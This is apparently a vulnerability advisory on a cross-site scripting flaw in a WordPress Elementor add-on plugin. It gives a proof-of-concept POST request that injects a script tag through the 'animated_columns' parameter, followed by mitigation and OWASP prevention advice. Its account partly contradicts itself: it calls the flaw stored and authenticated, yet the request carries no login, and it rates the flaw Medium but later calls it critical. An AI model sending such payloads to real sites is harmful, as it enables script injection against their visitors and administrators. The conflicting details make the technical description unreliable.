CVE-2021-24351 – Stored XSS in The Plus Addons for Elementor (WordPress Plugin)
CVE ID: CVE-2021-24351
System Affected: WordPress
Vulnerability Type: Stored Cross-Site Scripting (XSS)
CNA Score (CVSS v3.1): 6.1 (Medium)
Affected Plugin: The Plus Addons for Elementor
Vulnerable Versions: < 4.1.12
Exploit Type: Remote, Authenticated
Overview
CVE-2021-24351 is a stored Cross-Site Scripting (XSS) vulnerability affecting The Plus Addons for Elementor plugin for WordPress, prior to version 4.1.12. This vulnerability allows an authenticated attacker (with Contributor or higher role) to inject malicious JavaScript code into specific plugin parameters which, when rendered in the admin dashboard or front-end, will execute in the victim’s browser context.
This vulnerability arises due to insufficient input sanitization and output escaping on dynamic content parameters used by the plugin. The injected scripts can persist in the database and get executed on future page views, making it a stored variant of XSS.
Proof of Concept (PoC)
The following HTTP request demonstrates how the vulnerability can be exploited using a POST request to admin-ajax.php
:
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 174
Connection: close
action=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(%2fXSS%2f)%3c%2fscript%3e
In this payload, the vulnerable parameter animated_columns
accepts unsanitized input which is later rendered directly into the HTML DOM. The JavaScript payload (<script>alert(/XSS/)</script>
) is stored in the backend and executed whenever the element is displayed.
Technical Analysis
- Entry Point:
admin-ajax.php
with action theplus_more_post
- Vulnerable Parameter:
animated_columns
- Root Cause: Lack of input sanitization (
sanitize_text_field()
, esc_html()
) on dynamic parameters.
- Impact: Malicious scripts can be stored and executed in the admin or frontend UI, leading to session hijacking, privilege escalation, or redirection attacks.
Mitigation
The issue was addressed in version 4.1.12 of the plugin. Site administrators are strongly advised to:
- Update the plugin to the latest version immediately.
- Sanitize and validate user inputs at both client and server levels.
- Use a Web Application Firewall (WAF) to detect and block malicious POST requests.
- Restrict sensitive plugin features to trusted user roles only.
About XSS (According to OWASP)
Cross-Site Scripting (XSS) is a common vulnerability that allows attackers to inject malicious scripts into web applications. When executed in the context of another user’s browser, these scripts can steal cookies, redirect users, deface web pages, or launch phishing attacks.
Types of XSS:
- Stored XSS: Malicious code is stored on the server (e.g., in the database) and served to other users.
- Reflected XSS: Payload is reflected in real-time from the request into the response.
- DOM-based XSS: Execution occurs via client-side JavaScript manipulation of the DOM.
Prevention Tips (OWASP):
- Sanitize user inputs.
- Escape outputs before rendering them in HTML, JS, or attributes.
- Use frameworks that auto-escape by default (e.g., React, Angular).
- Employ Content Security Policy (CSP).
Reference: OWASP XSS Guide
Conclusion
CVE-2021-24351 serves as a reminder that even trusted WordPress plugins can harbor critical security flaws. By exploiting this vulnerability, an attacker with authenticated access could execute persistent scripts, compromising the security of both users and administrators. Immediate patching, secure coding practices, and user permission management are key to mitigating such risks.
References